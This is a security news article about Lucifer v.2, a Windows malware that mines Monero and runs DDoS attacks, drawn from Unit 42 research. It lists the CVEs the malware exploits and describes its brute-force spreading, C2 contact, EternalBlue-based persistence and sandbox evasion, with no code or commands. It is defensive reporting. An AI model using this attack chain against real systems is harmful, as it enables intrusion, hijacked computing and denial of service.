A latest variant of the powerful cryptojacking and DDoS-based malware is abusing critical vulnerabilities to infect Windows machines. The malware which has been dubbed Lucifer is part of an active campaign against Windows hosts and numerous weaponized exploits have been used in the latest attacks.
According to Palo Alto Network’s Unit 42, the malware operator named their creation Satan DDoS. Since Satan Ransomware already exists, the researchers assigned it a different name.
Researchers Ken Hsu, Durgesh Sangvikar, Zhibin Zhang and Chris Navarrete published a blog post which reads that the latest variant of Lucifer, v.2, was discovered on May 29 while investigating the exploit of CVE-2019-9081, a deserialization bug in Laravel Framework that can be abused to conduct remote code execution (RCE) attacks.
On further analysis it was found that this is one among the many vulnerabilities that the malware uses such as CVE-2014-6287, CVE-2018-1000861, CVE-2017-10271, ThinkPHP RCE vulnerabilities (CVE-2018-20062), CVE-2018-7600, CVE-2017-9791, CVE-2019-9081, CVE-2017-0144, CVE-2017-0145, and CVE-2017-8464 etc.
All the security flaws have patches available, but on those systems, which have not been updated, attacks using these issues are trivial to exploit and code execution for the purpose of cryptocurrency mining is one of the main goals.
Lucifer is a powerful hybrid malware capable of cryptojacking and harnessing infected machines to perform Distributed Denial-of-Service (DDoS) attacks.
The malware will scan for open TCP ports 135 (RPC) and 1433(MSSQL) to find targets and will use credential-stuffing attacks in order to obtain access. The malware may infect its targets through IPC, WMI, SMB, and FTP via brute-force attacks, as well as through MSSQL, RPC, and network sharing.
After establishing on a targeted machine, the malware drops XMRig, a program used to covertly mine for the Monero (XMR) cryptocurrency.
Lucifer will also connect to a command-and-control (C2) server to receive commands — such as to launch a DDoS attack — transfer stolen system data, and inform the operators about the status of the Monero cryptocurrency miner.
Lucifer uses numerous vulnerabilities and brute-force attacks to compromise any additional hosts connected to the original infection point.
The researchers stated that the targets are Windows hosts on both the internet and intranet, given that the attacker is leveraging certutil utility in the payload for malware propagation.
EternalBlue, EternalRomance, and DoublePulsar backdoors are dropped to establish endurance and the malware will also tamper with the Windows registry to schedule itself as a task at startup.
Lucifer will also attempt to evade detection or reverse engineering by checking for the presence of sandboxes or virtual machines. If any are found, the malware enters an “infinite loop” which stops operations.
The first attack wave using Lucifer v.1 was detected on June 10. The next day, malware was upgraded to v.2, which “wreaked havoc” on target machines. As of now the attacks are ongoing.
The researchers advise the users to apply updates and patches to the affected software as early as possible.